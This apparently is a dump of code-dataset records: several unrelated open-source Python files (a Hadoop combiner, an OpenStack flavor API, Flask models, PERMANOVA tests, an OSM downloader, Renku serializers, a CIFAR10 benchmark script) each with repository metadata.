] | null | null | null | coursework2/task3/combiner_2.py | foundnet/UOE_EP_coursework1 | 25ab8ff2beaa4fbde5a0d4519abb84d8e43cf9d8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import sys
cur_ids = ""
cur_cnt = 0
cur_uid = ""
for line in sys.stdin:
str_uid,str_cnt,str_ids = line.split("\t",2)
str_uid = str_uid.strip()
str_cnt = str_cnt.strip()
str_ids = str_ids.strip()
if str_uid == "" or str_ids == "":
continue
if str_uid != cur_uid:
if cur_uid != "":
print cur_uid + "\t" + str(cur_cnt) + "\t" + cur_ids
cur_uid = str_uid
cur_cnt = int(str_cnt)
cur_ids = str_ids
else :
cur_cnt = cur_cnt + int(str_cnt)
cur_ids = cur_ids + ", " + str_ids
if cur_uid != "":
print cur_uid + "\t" + str(cur_cnt) + "\t" + cur_ids
| 22.233333 | 64 | 0.547226 |
79551b1c329e55581fd53fc00f1d907e09c97fe2 | 3,344 | py | Python | nova/api/openstack/compute/contrib/flavormanage.py | bopopescu/nova-33 | 6d3cf9010a45edb16f28b2582eafe35666381d1f | [
"Apache-2.0"
] | 1 | 2019-11-06T12:21:59.000Z | 2019-11-06T12:21:59.000Z | nova/api/openstack/compute/contrib/flavormanage.py | bopopescu/nova-33 | 6d3cf9010a45edb16f28b2582eafe35666381d1f | [
"Apache-2.0"
] | null | null | null | nova/api/openstack/compute/contrib/flavormanage.py | bopopescu/nova-33 | 6d3cf9010a45edb16f28b2582eafe35666381d1f | [
"Apache-2.0"
] | 2 | 2019-12-23T18:06:28.000Z | 2020-07-24T08:44:28.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import webob
from nova.api.openstack.compute import flavors as flavors_api
from nova.api.openstack.compute.views import flavors as flavors_view
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.compute import instance_types
from nova import exception
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'flavormanage')
class FlavorManageController(wsgi.Controller):
"""
The Flavor Lifecycle API controller for the OpenStack API.
"""
_view_builder_class = flavors_view.ViewBuilder
def __init__(self):
super(FlavorManageController, self).__init__()
@wsgi.action("delete")
def _delete(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
flavor = instance_types.get_instance_type_by_flavor_id(
id, ctxt=context, read_deleted="no")
except exception.NotFound, e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
instance_types.destroy(flavor['name'])
return webob.Response(status_int=202)
@wsgi.action("create")
@wsgi.serializers(xml=flavors_api.FlavorTemplate)
def _create(self, req, body):
context = req.environ['nova.context']
authorize(context)
vals = body['flavor']
name = vals['name']
flavorid = vals.get('id')
memory_mb = vals.get('ram')
vcpus = vals.get('vcpus')
root_gb = vals.get('disk')
ephemeral_gb = vals.get('OS-FLV-EXT-DATA:ephemeral')
swap = vals.get('swap')
rxtx_factor = vals.get('rxtx_factor')
is_public = vals.get('os-flavor-access:is_public', True)
try:
flavor = instance_types.create(name, memory_mb, vcpus,
root_gb, ephemeral_gb, flavorid,
swap, rxtx_factor, is_public)
req.cache_db_flavor(flavor)
except exception.InstanceTypeExists as err:
raise webob.exc.HTTPConflict(explanation=err.format_message())
return self._view_builder.show(req, flavor)
class Flavormanage(extensions.ExtensionDescriptor):
"""
Flavor create/delete API support
"""
name = "FlavorManage"
alias = "os-flavor-manage"
namespace = ("http://docs.openstack.org/compute/ext/"
"flavor_manage/api/v1.1")
updated = "2012-01-19T00:00:00+00:00"
def get_controller_extensions(self):
controller = FlavorManageController()
extension = extensions.ControllerExtension(self, 'flavors', controller)
return [extension]
| 34.474227 | 79 | 0.668062 |
79551c683cbf26a998989f21ef12f4f391065232 | 3,749 | py | Python | app/models.py | brianngichu/pitches | d113fd851b3c6da3fab1f7e5774bc373f3d59f26 | [
"MIT"
] | null | null | null | app/models.py | brianngichu/pitches | d113fd851b3c6da3fab1f7e5774bc373f3d59f26 | [
"MIT"
] | null | null | null | app/models.py | brianngichu/pitches | d113fd851b3c6da3fab1f7e5774bc373f3d59f26 | [
"MIT"
] | null | null | null | from . import db, login_manager
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
#User class
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key = True)
username = db.Column(db.String(255))
email = db.Column(db.String(255))
pass_secure = db.Column(db.String(255))
pitches = db.relationship('Pitch', backref = 'user', lazy = "dynamic")
comments = db.relationship('Comment', backref = 'user', lazy = "dynamic")
bio = db.Column(db.String(255))
profile_pic_path = db.Column(db.String(100))
photoprofiles = db.relationship('PhotoProfile', backref = 'user', lazy = 'dynamic')
@property
def password(self):
raise AttributeError('You cannot read the password attribute')
@password.setter
def password(self, password):
self.pass_secure = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.pass_secure, password)
def __repr__(self):
return f'User {self.username}'
class Pitch(db.Model):
__tablename__ = 'pitches'
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(255))
content = db.Column(db.String)
category = db.Column(db.Integer, db.ForeignKey('categories.id'))
vote = db.Column(db.Integer)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
comments = db.relationship('Comment', backref = 'pitches', lazy = "dynamic")
votes = db.relationship('Vote', backref = 'pitches', lazy = "dynamic")
def save_pitch(self):
db.session.add(self)
db.session.commit()
@classmethod
def clear_pitches(cls):
Pitch.all_pitches.clear()
# display pitches
def get_pitches(id):
pitches = Pitch.query.filter_by(category_id=id).all()
return pitches
class Category(db.Model):
__tablename__ = 'categories'
id = db.Column(db.Integer, primary_key = True)
name = db.Column(db.String)
def save_category(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_categories(cls):
categories = Category.query.all()
return categories
class Comment(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key = True)
feedback = db.Column(db.String)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
pitch_id = db.Column(db.Integer, db.ForeignKey('pitches.id'))
votes = db.relationship('Vote', backref = 'comments', lazy = "dynamic")
def save_comment(self):
'''
Function that saves comments
'''
db.session.add(self)
db.session.commit()
@classmethod
def get_comments(self, id):
comment = Comments.query.order_by(Comments.time_posted.desc()).filter_by(pitches_id=id).all()
return comment
class Vote(db.Model):
__tablename__ = 'votes'
id = db.Column(db.Integer, primary_key = True)
vote = db.Column(db.Integer)
pitch_id = db.Column(db.Integer, db.ForeignKey('pitches.id'))
comment_id = db.Column(db.Integer, db.ForeignKey('comments.id'))
def save_vote(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_votes(cls,user_id,pitches_id):
votes = Vote.query.filter_by(user_id=user_id, pitches_id=pitches_id).all()
return votes
class PhotoProfile(db.Model):
__tablename__ = 'photoprofiles'
id = db.Column(db.Integer, primary_key = True)
pic_path = db.Column(db.String())
user_id = db.Column(db.Integer, db.ForeignKey("users.id")) | 32.6 | 101 | 0.670846 |
79551d1e2e8b3826bda7e6b578fc2d4f7809a543 | 224 | py | Python | src/11/simple_communication_between_interpreters/echoclient.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 14 | 2017-05-20T04:06:46.000Z | 2022-01-23T06:48:45.000Z | src/11/simple_communication_between_interpreters/echoclient.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 1 | 2021-06-10T20:17:55.000Z | 2021-06-10T20:17:55.000Z | src/11/simple_communication_between_interpreters/echoclient.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 15 | 2017-03-29T17:57:33.000Z | 2021-08-24T02:20:08.000Z | from multiprocessing.connection import Client
c = Client(('localhost', 25000), authkey=b'peekaboo')
c.send('hello')
print('Got:', c.recv())
c.send(42)
print('Got:', c.recv())
c.send([1, 2, 3, 4, 5])
print('Got:', c.recv())
| 22.4 | 53 | 0.642857 |
79551d6e70816185307a12a6ed9a28ab4a860c3b | 3,839 | py | Python | skbio/maths/stats/distance/tests/test_permanova.py | Jorge-C/bipy | 1097cefafc6f9bbb9d96f25b569892a3fe3f3600 | [
"BSD-3-Clause"
] | null | null | null | skbio/maths/stats/distance/tests/test_permanova.py | Jorge-C/bipy | 1097cefafc6f9bbb9d96f25b569892a3fe3f3600 | [
"BSD-3-Clause"
] | null | null | null | skbio/maths/stats/distance/tests/test_permanova.py | Jorge-C/bipy | 1097cefafc6f9bbb9d96f25b569892a3fe3f3600 | [
"BSD-3-Clause"
] | 1 | 2018-09-21T01:58:43.000Z | 2018-09-21T01:58:43.000Z | #! /usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import division
from unittest import TestCase, main
import numpy as np
import numpy.testing as npt
from skbio.core.distance import DistanceMatrix
from skbio.maths.stats.distance.permanova import PERMANOVA
class PERMANOVATests(TestCase):
"""All results were verified with R (vegan::adonis)."""
def setUp(self):
# Distance matrices with and without ties in the ranks, with 2 groups
# of equal size.
dm_ids = ['s1', 's2', 's3', 's4']
grouping_equal = ['Control', 'Control', 'Fast', 'Fast']
self.dm_ties = DistanceMatrix([[0, 1, 1, 4],
[1, 0, 3, 2],
[1, 3, 0, 3],
[4, 2, 3, 0]], dm_ids)
self.dm_no_ties = DistanceMatrix([[0, 1, 5, 4],
[1, 0, 3, 2],
[5, 3, 0, 3],
[4, 2, 3, 0]], dm_ids)
# Test with 3 groups of unequal size.
grouping_unequal = ['Control', 'Treatment1', 'Treatment2',
'Treatment1', 'Control', 'Control']
self.dm_unequal = DistanceMatrix(
[[0.0, 1.0, 0.1, 0.5678, 1.0, 1.0],
[1.0, 0.0, 0.002, 0.42, 0.998, 0.0],
[0.1, 0.002, 0.0, 1.0, 0.123, 1.0],
[0.5678, 0.42, 1.0, 0.0, 0.123, 0.43],
[1.0, 0.998, 0.123, 0.123, 0.0, 0.5],
[1.0, 0.0, 1.0, 0.43, 0.5, 0.0]],
['s1', 's2', 's3', 's4', 's5', 's6'])
self.permanova_ties = PERMANOVA(self.dm_ties, grouping_equal)
self.permanova_no_ties = PERMANOVA(self.dm_no_ties, grouping_equal)
self.permanova_unequal = PERMANOVA(self.dm_unequal, grouping_unequal)
def test_call_ties(self):
# Ensure we get the same results if we rerun the method on the same
# object.
for trial in range(2):
np.random.seed(0)
obs = self.permanova_ties()
self.assertEqual(obs.sample_size, 4)
npt.assert_array_equal(obs.groups, ['Control', 'Fast'])
self.assertAlmostEqual(obs.statistic, 2.0)
self.assertAlmostEqual(obs.p_value, 0.671)
self.assertEqual(obs.permutations, 999)
def test_call_no_ties(self):
np.random.seed(0)
obs = self.permanova_no_ties()
self.assertEqual(obs.sample_size, 4)
npt.assert_array_equal(obs.groups, ['Control', 'Fast'])
self.assertAlmostEqual(obs.statistic, 4.4)
self.assertAlmostEqual(obs.p_value, 0.332)
self.assertEqual(obs.permutations, 999)
def test_call_no_permutations(self):
obs = self.permanova_no_ties(0)
self.assertEqual(obs.sample_size, 4)
npt.assert_array_equal(obs.groups, ['Control', 'Fast'])
self.assertAlmostEqual(obs.statistic, 4.4)
self.assertEqual(obs.p_value, None)
self.assertEqual(obs.permutations, 0)
def test_call_unequal_group_sizes(self):
np.random.seed(0)
obs = self.permanova_unequal()
self.assertEqual(obs.sample_size, 6)
npt.assert_array_equal(obs.groups,
['Control', 'Treatment1', 'Treatment2'])
self.assertAlmostEqual(obs.statistic, 0.578848, 6)
self.assertAlmostEqual(obs.p_value, 0.645)
self.assertEqual(obs.permutations, 999)
if __name__ == '__main__':
main()
| 38.777778 | 78 | 0.545715 |
795520740f095dac13b6bbb72ecd49be231df0bc | 7,693 | py | Python | src/py4geo/populate/tools.py | manuelep/py4geo | ad1b25f89b2f254d7270d05123fb3e6cb91186a9 | [
"Apache-2.0"
] | null | null | null | src/py4geo/populate/tools.py | manuelep/py4geo | ad1b25f89b2f254d7270d05123fb3e6cb91186a9 | [
"Apache-2.0"
] | null | null | null | src/py4geo/populate/tools.py | manuelep/py4geo | ad1b25f89b2f254d7270d05123fb3e6cb91186a9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from ..common import logger
from .optutils.base import Turbo
from . import io
import json
import osm2geojson
from ..tools.tile import Bbox
# from .tile import boxtiles
from tqdm import tqdm
from sys import stdout, getsizeof #, _getframe
from mptools.dataformat import smartbytes
import geojson
from supermercado.burntiles import burn
import mercantile
T = lambda s: s
get_uri = lambda xtile, ytile, zoom: "{xtile:d}/{ytile:d}/{zoom:d}".format(xtile=xtile, ytile=ytile, zoom=zoom)
class barFormat(object):
"""docstring for barFormat."""
base_fmt = 'desc', 'n', 'rate', 'rate_inv', 'elapsed', 'remaining', 'unit',
augm_fmt = 'percentage', 'total',
@staticmethod
def cast(value):
""" """
try:
return json.loads(value)
except ValueError:
return value
@classmethod
def template(cls, augm=False):
fmt = lambda args: 'progress '+'{{{}}}'.format('};{'.join(args))
return fmt(cls.headers(augm=augm))
@classmethod
def headers(cls, augm=True):
if augm:
return cls.base_fmt+cls.augm_fmt
else:
return cls.base_fmt
@classmethod
def parse(cls, *rows):
""" """
return filter(lambda shit: shit, map(
lambda row: dict(zip(cls.headers(), map(cls.cast, filter(lambda v: v.strip(), row.split(';'))))),
rows
))
class MyTqdm(dict):
"""docstring for MyTqdm."""
def __init__(self, desc, **kwargs):
super(MyTqdm, self).__init__(**kwargs)
tot = sum(map(len, kwargs.values()))
self.tqdm = tqdm(
desc = desc,
total = tot,
# bar_format = barFormat.template(not not tot),
# file = stdout
)
def set_description(self, *args, **kwargs):
return self.tqdm.set_description(*args, **kwargs)
def __getattr__(self, key):
def __main():
for v in self[key]:
self.tqdm.update(1)
yield v
return [x for x in __main()]
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.tqdm.close()
def fetch_and_log_from_osm(query, pgcopy=False):
"""
query @string : The OSM filter query; Overpass QL or XML.
"""
# out_task_id = web2py_uuid()
# plugins.planet.logger.info("### {} >>>".format(out_task_id))
# plugins.planet.logger.info(query)
turbo = Turbo()
data = turbo(query.encode())
nodes = list(tqdm(
data.nodes,
desc = str(T('Downloading nodes from osm')),
# bar_format = barFormat.template(True if data.nodes else False),
# file = stdout
))
ways = list(tqdm(
data.ways,
desc = str(T('Downloading ways from osm')),
# bar_format = barFormat.template(True if data.ways else False),
# file = stdout
))
relations = list(tqdm(
data.relations,
desc = str(T('Downloading relations from osm')),
# bar_format = barFormat.template(True if data.relations else False),
# file = stdout
))
# dcounter = MyTqdm(
# str(T('Saving data to DB')),
# nodes = nodes,
# ways = ways,
# relations = relations
# )
# io.osm(dcounter.nodes, dcounter.ways, dcounter.relations, copy=pgcopy)
io.osm(*map(tqdm, (nodes, ways, relations,)), copy=pgcopy)
io.db.commit()
# if request.is_scheduler:
# timeLoggerDecorator(plugins.planet.logger)(Put.commit())
logger.info("Response size: {}".format(smartbytes(getsizeof(data))))
# plugins.planet.logger.info("<<< {} ###".format(out_task_id[:8]))
# return out_task_id
class Syncher(object):
"""docstring for Syncher."""
def __init__(self, xtile, ytile, zoom, uri=None, query=None, gtypes=['node', 'way', 'relation']):
super(Syncher, self).__init__()
self.uri = uri or get_uri(xtile, ytile, zoom)
self.tile = {'x': xtile, 'y': ytile, 'z': zoom}
tile_bounds = mercantile.bounds(mercantile.quadkey_to_tile(mercantile.quadkey(xtile, ytile, zoom)))
keys = ('w', 's', 'e', 'n',)
self.bbox = dict(zip(keys, map(str, (
tile_bounds.west,
tile_bounds.south,
tile_bounds.east,
tile_bounds.north,
)))) # minx, miny, maxx, maxy
if query is None:
query = [[{"k": "qwertyuiop", "modv": "not", "regv": "."}]]
self.base_query = {
'query': query,
'bbox': self.bbox,
'gtypes': ['node', 'way', 'relation'],
}
def __call__(self, newer_than=None, pgcopy=False):
"""
newer_than @datetime : Last update timestamp
"""
if newer_than is None:
_query = dict(self.base_query)
else:
_query = dict(self.base_query,
newer_than = newer_than.strftime("%Y-%m-%dT%H:%M:%SZ")
)
fetch_and_log_from_osm(
Turbo.build_query(lambda: [_query]),
pgcopy = pgcopy
)
def get_polys(featureCollection):
for feature in featureCollection['features']:
if feature['geometry']['type'] == 'MultiPolygon':
for poly in feature['geometry']['coordinates']:
xfeature = { "type": "Feature", "properties": {}, "geometry": { "type": "Polygon" } }
xfeature['geometry']['coordinates'] = poly
yield xfeature
elif feature['geometry']['type'] == 'Polygon':
yield feature
def tile2poly(xyz):
x, y, z = xyz
bounds = mercantile.bounds(x, y, z)
bbox = Bbox(bounds.west, bounds.south, bounds.east, bounds.north)
poly = bbox.as_gj_polygon
return poly
class OsmShell(object):
""" Downloads custom data from OSM inside administrative boundary geometry """
@staticmethod
def __boundary_filter(*args, **kw):
def main():
query = [
{"k": k, "v": "{}".format(v)} \
for k,v in kw.items()]+list(args)
yield {
# "bbox": Bbox(minlon, minlat, maxlon, maxlat).osm,
"query": [query],
"gtypes": ['relation']
}
return main
def __init__(self, name, admin_level=8, zoom=14):
"""
name @string : Boiundary name (e.g. Genova, Milano, etc.)
admin_level @integer : Please refer to https://wiki.openstreetmap.org/wiki/Key:admin_level
(e.g. 8 Comune or 6 Provincia)
zoom @integer : Dimension of tiles used for pixelating the boundary
"""
super(OsmShell, self).__init__()
query = Turbo.build_query(self.__boundary_filter(
{"k": "wikipedia", "regv": "it:"},
boundary = "administrative",
admin_level = admin_level,
name = name
))
turbo = Turbo()
data_, _ = turbo.__raw_call__(query.encode())
data = json.loads(data_)
fc = osm2geojson.json2geojson(data)
polys = list(get_polys(fc))
assert len(polys)>0
self.tiles = burn(polys, zoom)
@property
def tileCollection(self):
""" """
return geojson.FeatureCollection(list(map(
lambda gg: geojson.Feature(geometry=gg),
map(tile2poly, self.tiles)
)))
def __call__(self, query=None):
if query is None:
# Generic query for downloading everything
query = [[{"k": "qwertyuiop", "modv": "not", "regv": "."},],]
for tile in tqdm(self.tiles):
dbsyncher = Syncher(*tile, query=query)
dbsyncher()
| 30.649402 | 111 | 0.564929 |
795520b881b7da8f5dcfa058c1d4da6a931e396c | 1,254 | py | Python | Day4.1.py | m-berk/AdventOfCode2019 | 73a930fc24a726186364923fc0575c84e19176af | [
"MIT"
] | 1 | 2021-06-16T07:34:30.000Z | 2021-06-16T07:34:30.000Z | Day4.1.py | m-berk/AdventOfCode2019 | 73a930fc24a726186364923fc0575c84e19176af | [
"MIT"
] | null | null | null | Day4.1.py | m-berk/AdventOfCode2019 | 73a930fc24a726186364923fc0575c84e19176af | [
"MIT"
] | 2 | 2020-09-03T07:47:52.000Z | 2021-02-04T21:07:40.000Z |
def getNumb(Arr):
return 100000*Arr[0]+10000*Arr[1]+1000*Arr[2]+100*Arr[3]+10*Arr[4]+Arr[5]
rangeStart = 367479
rangeFinish =893698
Array=[]
Array.append(3)
Array.append(6)
Array.append(7)
Array.append(4)
Array.append(7)
Array.append(9)
Lim=[]
Lim.append(8)
Lim.append(9)
Lim.append(3)
Lim.append(6)
Lim.append(9)
Lim.append(8)
Results=[]
for x0 in range(Array[0],Lim[0]+1,1):
Array[0] = x0
for x1 in range(x0,10,1):
Array[1] = x1
for x2 in range(x1, 10, 1):
Array[2] = x2
for x3 in range(x2, 10, 1):
Array[3] = x3
for x4 in range(x3, 10, 1):
Array[4] = x4
for x5 in range(x4, 10, 1):
Array[5] = x5
HaveMultiples = False
for i in range(5):
if(Array[i]==Array[i+1]):
HaveMultiples=True
if(HaveMultiples ):
numb = getNumb(Array)
if(numb >= rangeStart and numb <= rangeFinish):
Results.append(numb)
print(Results)
print(len(Results)) | 25.591837 | 78 | 0.455343 |
795520e3eee84953c12d47393ff3ccd2ce4092b9 | 8,261 | py | Python | renku/service/serializers/cache.py | almutlue/renku-python | 84b6d0f448161f33a3caa1b9631ae47840d648c6 | [
"Apache-2.0"
] | null | null | null | renku/service/serializers/cache.py | almutlue/renku-python | 84b6d0f448161f33a3caa1b9631ae47840d648c6 | [
"Apache-2.0"
] | null | null | null | renku/service/serializers/cache.py | almutlue/renku-python | 84b6d0f448161f33a3caa1b9631ae47840d648c6 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright 2020 - Swiss Data Science Center (SDSC)
# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and
# Eidgenössische Technische Hochschule Zürich (ETHZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Renku service cache serializers."""
import time
import uuid
from datetime import datetime
from urllib.parse import urlparse
from marshmallow import Schema, ValidationError, fields, post_load, pre_load, validates
from werkzeug.utils import secure_filename
from renku.core.errors import ConfigurationError
from renku.core.models.git import GitURL
from renku.service.config import PROJECT_CLONE_DEPTH_DEFAULT
from renku.service.serializers.common import RenkuSyncSchema, RepositoryContext
from renku.service.serializers.rpc import JsonRPCResponse
def extract_file(request):
"""Extract file from Flask request.
:raises: `ValidationError`
"""
files = request.files
if "file" not in files:
raise ValidationError("missing key: file")
file = files["file"]
if file and not file.filename:
raise ValidationError("wrong filename: {0}".format(file.filename))
if file:
file.filename = secure_filename(file.filename)
return file
class FileUploadRequest(Schema):
"""Request schema for file upload."""
override_existing = fields.Boolean(missing=False)
unpack_archive = fields.Boolean(missing=False)
class FileUploadContext(Schema):
"""Context schema for file upload."""
created_at = fields.DateTime(missing=datetime.utcnow)
file_id = fields.String(missing=lambda: uuid.uuid4().hex)
content_type = fields.String(missing="unknown")
file_name = fields.String(required=True)
# measured in bytes (comes from stat() - st_size)
file_size = fields.Integer(required=True)
relative_path = fields.String(required=True)
is_archive = fields.Boolean(missing=False)
is_dir = fields.Boolean(required=True)
unpack_archive = fields.Boolean(missing=False)
class FileUploadResponse(Schema):
"""Response schema for file upload."""
files = fields.List(fields.Nested(FileUploadContext), required=True)
class FileUploadResponseRPC(JsonRPCResponse):
"""RPC response schema for file upload response."""
result = fields.Nested(FileUploadResponse)
class FileListResponse(Schema):
"""Response schema for files listing."""
files = fields.List(fields.Nested(FileUploadContext), required=True)
class FileListResponseRPC(JsonRPCResponse):
"""RPC response schema for files listing."""
result = fields.Nested(FileListResponse)
class ProjectCloneRequest(Schema):
"""Request schema for project clone."""
git_url = fields.String(required=True)
depth = fields.Integer(missing=PROJECT_CLONE_DEPTH_DEFAULT)
ref = fields.String(missing=None)
class ProjectCloneContext(ProjectCloneRequest):
"""Context schema for project clone."""
project_id = fields.String(missing=lambda: uuid.uuid4().hex)
# measured in ms
timestamp = fields.Integer(missing=time.time() * 1e3)
name = fields.String()
fullname = fields.String()
email = fields.String()
owner = fields.String()
token = fields.String()
@validates("git_url")
def validate_git_url(self, value):
"""Validates git url."""
try:
GitURL.parse(value)
except UnicodeError as e:
raise ValidationError("`git_url` contains unsupported characters") from e
except ConfigurationError as e:
raise ValidationError("Invalid `git_url`") from e
@pre_load()
def set_owner_name(self, data, **kwargs):
"""Set owner and name fields."""
try:
git_url = GitURL.parse(data["git_url"])
except UnicodeError as e:
raise ValidationError("`git_url` contains unsupported characters") from e
except ConfigurationError as e:
raise ValidationError("Invalid `git_url`") from e
if git_url.owner is None:
raise ValidationError("Invalid `git_url`")
data["owner"] = git_url.owner
if git_url.name is None:
raise ValidationError("Invalid `git_url`")
data["name"] = git_url.name
return data
def format_url(self, data):
"""Format url with auth."""
git_url = urlparse(data["git_url"])
url = "oauth2:{0}@{1}".format(data["token"], git_url.netloc)
return git_url._replace(netloc=url).geturl()
@post_load
def finalize_data(self, data, **kwargs):
"""Finalize data."""
data["url_with_auth"] = self.format_url(data)
if not data["depth"]:
# NOTE: In case of `depth=None` or `depth=0` we set to default depth.
data["depth"] = PROJECT_CLONE_DEPTH_DEFAULT
try:
depth = int(data["depth"])
if depth < 0:
# NOTE: In case of `depth<0` we remove the depth limit.
data["depth"] = None
except ValueError:
data["depth"] = PROJECT_CLONE_DEPTH_DEFAULT
return data
class ProjectCloneResponse(Schema):
"""Response schema for project clone."""
project_id = fields.String(required=True)
git_url = fields.String(required=True)
initialized = fields.Boolean(default=False)
class ProjectCloneResponseRPC(JsonRPCResponse):
"""RPC response schema for project clone response."""
result = fields.Nested(ProjectCloneResponse)
class ProjectListResponse(Schema):
"""Response schema for project listing."""
projects = fields.List(fields.Nested(ProjectCloneResponse), required=True)
class ProjectListResponseRPC(JsonRPCResponse):
"""RPC response schema for project listing."""
result = fields.Nested(ProjectListResponse)
class ProjectMigrateRequest(RepositoryContext):
"""Request schema for project migrate."""
force_template_update = fields.Boolean(default=False)
skip_template_update = fields.Boolean(default=False)
skip_docker_update = fields.Boolean(default=False)
skip_migrations = fields.Boolean(default=False)
@pre_load()
def default_commit_message(self, data, **kwargs):
"""Set default commit message."""
if not data.get("commit_message"):
data["commit_message"] = "service: renku migrate"
return data
class ProjectMigrateResponse(RenkuSyncSchema):
"""Response schema for project migrate."""
was_migrated = fields.Boolean()
template_migrated = fields.Boolean()
docker_migrated = fields.Boolean()
messages = fields.List(fields.String)
class ProjectMigrateResponseRPC(JsonRPCResponse):
"""RPC response schema for project migrate."""
result = fields.Nested(ProjectMigrateResponse)
class ProjectMigrationCheckRequest(Schema):
"""Request schema for project migration check."""
project_id = fields.String()
git_url = fields.String()
branch = fields.String()
class ProjectMigrationCheckResponse(Schema):
"""Response schema for project migration check."""
migration_required = fields.Boolean()
template_update_possible = fields.Boolean()
automated_template_update = fields.Boolean()
current_template_version = fields.String(allow_none=True)
latest_template_version = fields.String(allow_none=True)
template_source = fields.String()
template_ref = fields.String()
template_id = fields.String()
docker_update_possible = fields.Boolean()
project_supported = fields.Boolean()
project_version = fields.String()
latest_version = fields.String()
class ProjectMigrationCheckResponseRPC(JsonRPCResponse):
"""RPC response schema for project migration check."""
result = fields.Nested(ProjectMigrationCheckResponse)
| 30.596296 | 87 | 0.702094 |
795521a501638724f923e2b6927c56510c9ebf97 | 2,940 | py | Python | benchmark_params.py | adarsh-kr/CVModelsBenchmark | 85aeb76c7c796d86baa97e1272aea83d734665b5 | [
"MIT"
] | null | null | null | benchmark_params.py | adarsh-kr/CVModelsBenchmark | 85aeb76c7c796d86baa97e1272aea83d734665b5 | [
"MIT"
] | null | null | null | benchmark_params.py | adarsh-kr/CVModelsBenchmark | 85aeb76c7c796d86baa97e1272aea83d734665b5 | [
"MIT"
] | null | null | null | '''Train CIFAR10 with PyTorch.'''
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
from models import *
from utils import progress_bar
import statistics
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
parser.add_argument('--arch', help="which architecture to use")
parser.add_argument('--iters', default=100, type=int, help='iters')
parser.add_argument('--batch_size', default=64, type=int, help='iters')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Data
print('==> Preparing data..')
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
if args.arch == "vgg19":
net = VGG('VGG19')
elif args.arch == "vgg16":
net = VGG('VGG16')
elif args.arch == "vgg11":
net = VGG('VGG11')
elif args.arch == "resnet152":
net = ResNet152()
elif args.arch == "resnet18":
net = ResNet18()
elif args.arch == "resnet50":
net = ResNet50()
elif args.arch == "resnet34":
net = ResNet34()
elif args.arch == "resnet101":
net = ResNet101()
elif args.arch == "googlenet":
net = GoogLeNet()
elif args.arch == "alexnet":
raise NotImplementedError
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
num_params = count_parameters(net)
out = ("{},{}".format(args.arch,num_params))
with open("models_num_params.txt", "a") as writer:
writer.write(out+"\n")
| 30.625 | 108 | 0.707823 |
